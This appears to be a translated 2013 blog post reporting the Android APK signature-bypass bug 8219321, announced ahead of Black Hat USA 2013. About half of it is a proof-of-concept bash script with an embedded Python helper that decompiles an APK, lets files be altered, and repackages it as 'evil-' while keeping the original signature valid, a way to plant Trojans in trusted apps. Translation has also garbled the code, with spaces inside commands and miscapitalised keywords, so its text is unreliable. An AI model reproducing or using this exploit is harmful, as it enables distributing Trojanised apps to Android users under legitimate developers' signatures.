Flattr this!

A few days ago, the company Bluebox Security announced that at the Black Hat USA 2013 conference, which begins July 27, 2013, they will talk about the enchanting vulnerability in the security model of the operating system Android, which allows an attacker to modify the contents of the APK file, without changing the cryptographic signature. In other words, any application can add the Trojans, keeping the cryptographic signature of the original author’s application.

The vulnerability has been around for four years since Android 1.6, that is, there is a minimum of 900 million devices. About the bug reported to Google in February, it was registered under number 8219321, and seemed to have closed in new versions of firmware Samsung, but stayed on all other devices.

Hackers from the company Via Forensics did not wait for the conference – and yesterday issued a PoC exploit code .

Decompilation, the introduction of the code and recompile the APK can be accomplished using the program to reverse engineer APKTool .

Simple code published below, exploits a vulnerability of the operating system Android, which verifies the signature of the original file, but it sets an updated version.

#! / Bin / bash
# PoC for Android bug 8219321 by @ pof
# + Info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [-z $ 1]; then echo "Usage: $ 0 "; Exit 1; fi
APK = $ 1
rm-r out out.apk tmp 2> / dev / null
java-jar apktool.jar d $ APK out
# Apktool d $ APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java-jar apktool.jar b out out.apk
# Apktool b out out.apk
mkdir tmp
cd tmp /
unzip .. / $ APK
mv .. / out.apk.
cat> poc.py <<-EOF
#! / Usr / bin / python
import zipfile 
import sys
z = zipfile.ZipFile (sys.argv [1], "a")
z.write (sys.argv [2])
z.close ()
EOF
chmod 755 poc.py
for f in `find. -Type f | egrep-v "(poc.py | out.apk)" `; do. / Poc.py out.apk" $ f "; done
cp out.apk .. / evil-$ APK
cd ..
rm-rf tmp out
echo "Modified APK: evil-$ APK"